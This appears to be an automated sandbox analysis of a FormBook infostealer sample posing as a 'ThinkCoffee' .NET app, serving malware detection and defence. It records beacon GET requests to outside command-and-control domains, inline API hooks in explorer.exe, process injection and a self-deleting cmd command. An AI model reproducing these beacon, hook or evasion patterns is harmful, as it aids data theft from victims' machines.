SHA-512: 77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.6744819259251145
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: XhU4EXUp0x.exe
File size: 907264
MD5: 49c83eceb8a816b959a778e5f2e78801
SHA1: ead9055c813de47edfec5bc46a0d896df4b4af2e
SHA256: 2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
SHA512: 09b42603c00de62fe0426f202a6809c0d7ed2164f6e3da1ab124a9d02e75eea115a2ad650905a2df4e9d9bbdb4347c4283eed1c161cfdf549713cbb46ca6a6d1
SSDEEP: 24576:EE4VwfX9zrNeBUdtEqTGokrWc4eJNPs2ruVc:EE4VwfX9PwBU8rWc5rGc
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4decea
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60C3DF04 [Fri Jun 11 22:09:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdec98 | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe0000 | 0x5dc | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe2000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xdeb60 | 0x1c | .text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xdccf0 | 0xdce00 | False | 0.803978980971 | data | 7.68116376135 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xe0000 | 0x5dc | 0x600 | False | 0.426432291667 | data | 4.164077085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xe2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_VERSION | 0xe0090 | 0x34c | data | |
                                        RT_MANIFEST | 0xe03ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                        Imports

                                        DLL | Import
                                        mscoree.dll | _CorExeMain

                                        Version Infos

                                        Description | Data
                                        Translation | 0x0000 0x04b0
                                        LegalCopyright | Copyright 2017
                                        Assembly Version | 1.0.0.0
                                        InternalName | ProfileOptimization.exe
                                        FileVersion | 1.0.0.0
                                        CompanyName |
                                        LegalTrademarks |
                                        Comments |
                                        ProductName | ThinkCoffee
                                        ProductVersion | 1.0.0.0
                                        FileDescription | ThinkCoffee
                                        OriginalFilename | ProfileOptimization.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jun 12, 2021 08:58:45.443835974 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:45.486952066 CEST | 80 | 49762 | 66.235.200.146 | 192.168.2.4
                                        Jun 12, 2021 08:58:45.487123966 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:45.487462997 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:45.529809952 CEST | 80 | 49762 | 66.235.200.146 | 192.168.2.4
                                        Jun 12, 2021 08:58:45.999707937 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:46.042366028 CEST | 80 | 49762 | 66.235.200.146 | 192.168.2.4
                                        Jun 12, 2021 08:58:46.042442083 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:59:06.257075071 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.451848030 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.452025890 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.452203989 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.651827097 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.651859045 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.651873112 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.651887894 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.652347088 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.652540922 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.847349882 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jun 12, 2021 08:57:05.901299000 CEST | 53157 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:05.951527119 CEST | 53 | 53157 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:06.667735100 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:06.718683958 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:07.914366961 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:07.965502977 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:08.203623056 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:08.266376972 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:09.575119019 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:09.634443998 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:10.707788944 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:10.769614935 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:11.819053888 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:11.882215023 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:12.799154043 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:12.860248089 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:13.952930927 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:14.003428936 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:14.747575045 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:14.797682047 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:15.725955009 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:15.786371946 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:16.712888956 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:16.763209105 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:17.877006054 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:17.933020115 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:19.560508013 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:19.620259047 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:20.493185043 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:20.545531988 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:21.318283081 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:21.368737936 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:22.212704897 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:22.262896061 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:23.036264896 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:23.086296082 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:23.833759069 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:23.884001970 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:24.777329922 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:24.838646889 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:25.728360891 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:25.786494970 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:35.281550884 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:35.343091011 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:58.055152893 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:58.217106104 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:59.370914936 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:59.433738947 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:00.118191004 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:00.274250031 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:00.799945116 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:00.861430883 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:01.438102007 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:01.506112099 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:01.673754930 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:01.674573898 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:01.727037907 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:01.744715929 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:02.097090006 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:02.161220074 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:02.846249104 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:02.908121109 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:03.773226023 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:03.833061934 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:08.391108036 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:08.449613094 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:08.876105070 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:08.934951067 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:17.089121103 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:17.150459051 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:45.281604052 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:45.436830044 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:56.410811901 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:56.483880043 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:58.555881023 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:58.626697063 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.180969000 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:59:06.255776882 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Jun 12, 2021 08:58:45.281604052 CEST | 192.168.2.4 | 8.8.8.8 | 0x2a48 | Standard query (0) | www.gentrypartyof8.com | A (IP address) | IN (0x0001)
                                        Jun 12, 2021 08:59:06.180969000 CEST | 192.168.2.4 | 8.8.8.8 | 0x4b68 | Standard query (0) | www.rsyueda.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Jun 12, 2021 08:57:05.951527119 CEST | 8.8.8.8 | 192.168.2.4 | 0x52b2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST | 8.8.8.8 | 192.168.2.4 | 0x2a48 | No error (0) | www.gentrypartyof8.com | gentrypartyof8.com | | CNAME (Canonical name) | IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST | 8.8.8.8 | 192.168.2.4 | 0x2a48 | No error (0) | gentrypartyof8.com | | 66.235.200.146 | A (IP address) | IN (0x0001)
                                        Jun 12, 2021 08:59:06.255776882 CEST | 8.8.8.8 | 192.168.2.4 | 0x4b68 | No error (0) | www.rsyueda.com | | 23.82.229.132 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.gentrypartyof8.com
                                        • www.rsyueda.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.4 | 49762 | 66.235.200.146 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jun 12, 2021 08:58:45.487462997 CEST | 8357 | OUT | GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.gentrypartyof8.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.4 | 49765 | 23.82.229.132 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jun 12, 2021 08:59:06.452203989 CEST | 8377 | OUT | GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.rsyueda.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jun 12, 2021 08:59:06.651827097 CEST | 8378 | IN | HTTP/1.1 500 Internal Server Error
                                        Cache-Control: private
                                        Content-Type: text/html; charset=utf-8
                                        Server: Microsoft-IIS/8.5
                                        X-AspNet-Version: 4.0.30319
                                        X-Powered-By: ASP.NET
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: *
                                        Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                        Date: Sat, 12 Jun 2021 06:59:03 GMT
                                        Connection: close
                                        Content-Length: 4082
                                        Data Raw: [hex dump of the response body omitted; see Data Ascii below]
                                        Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy;


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function Name | Hook Type | Active in Processes
                                        PeekMessageA | INLINE | explorer.exe
                                        PeekMessageW | INLINE | explorer.exe
                                        GetMessageW | INLINE | explorer.exe
                                        GetMessageA | INLINE | explorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function Name | Hook Type | New Data
                                        PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                        PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE9

                                        Statistics

                                        Behavior

                                        System Behavior

                                        General

                                        Start time: 08:57:11
                                        Start date: 12/06/2021
                                        Path: C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit): true
                                        Commandline: 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase: 0x340000
                                        File size: 907264 bytes
                                        MD5 hash: 49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: .Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation: low

                                        General

                                        Start time: 08:57:15
                                        Start date: 12/06/2021
                                        Path: C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit): true
                                        Commandline: C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Imagebase: 0xe60000
                                        File size: 907264 bytes
                                        MD5 hash: 49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation: low

                                        General

                                        Start time: 08:57:18
                                        Start date: 12/06/2021
                                        Path: C:\Windows\explorer.exe
                                        Wow64 process (32bit): false
                                        Commandline:
                                        Imagebase: 0x7ff6fee60000
                                        File size: 3933184 bytes
                                        MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: high

                                        General

                                        Start time: 08:57:38
                                        Start date: 12/06/2021
                                        Path: C:\Windows\SysWOW64\raserver.exe
                                        Wow64 process (32bit): true
                                        Commandline: C:\Windows\SysWOW64\raserver.exe
                                        Imagebase: 0x1370000
                                        File size: 108544 bytes
                                        MD5 hash: 2AADF65E395BFBD0D9B71D7279C8B5EC
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:08:57:42
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:08:57:43
                                        Start date:12/06/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis
